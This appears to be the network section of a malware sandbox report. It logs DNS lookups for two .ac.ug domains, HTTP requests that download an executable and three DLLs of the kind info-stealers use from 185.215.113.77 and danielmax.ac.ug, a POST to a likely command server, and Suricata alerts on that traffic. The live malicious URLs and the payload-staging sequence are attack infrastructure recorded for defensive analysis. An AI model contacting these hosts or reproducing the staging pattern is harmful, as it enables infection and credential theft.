Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
danielmi.ac.ug | 185.215.113.77 | |
danielmax.ac.ug | 185.215.113.77 |
GET
200
http://185.215.113.77/osxcjhgfd.exe
REQUEST
RESPONSE
BODY
GET /osxcjhgfd.exe HTTP/1.1
Host: 185.215.113.77
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 03:10:21 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Fri, 23 Jul 2021 08:52:57 GMT
ETag: "7fa00-5c7c687ae55c2"
Accept-Ranges: bytes
Content-Length: 522752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://danielmi.ac.ug/index.php
REQUEST
RESPONSE
BODY
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: danielmi.ac.ug
Content-Length: 91
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 03:10:25 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html
POST
200
http://danielmax.ac.ug/softokn3.dll
REQUEST
RESPONSE
BODY
POST /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: danielmax.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 03:10:56 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT
ETag: "235d0-58a9fc6206c00"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://danielmax.ac.ug/sqlite3.dll
REQUEST
RESPONSE
BODY
POST /sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: danielmax.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 03:11:01 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT
ETag: "9d9d8-5561b116cc500"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://danielmax.ac.ug/freebl3.dll
REQUEST
RESPONSE
BODY
POST /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: danielmax.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 25 Jul 2021 03:11:30 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT
ETag: "519d0-58a9fc2e87280"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.102 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 185.215.113.77:80 -> 192.168.56.102:49169 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
TCP 185.215.113.77:80 -> 192.168.56.102:49169 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 192.168.56.102:49162 -> 185.215.113.77:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected |
TCP 185.215.113.77:80 -> 192.168.56.102:49162 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 185.215.113.77:80 -> 192.168.56.102:49162 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 185.215.113.77:80 -> 192.168.56.102:49162 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts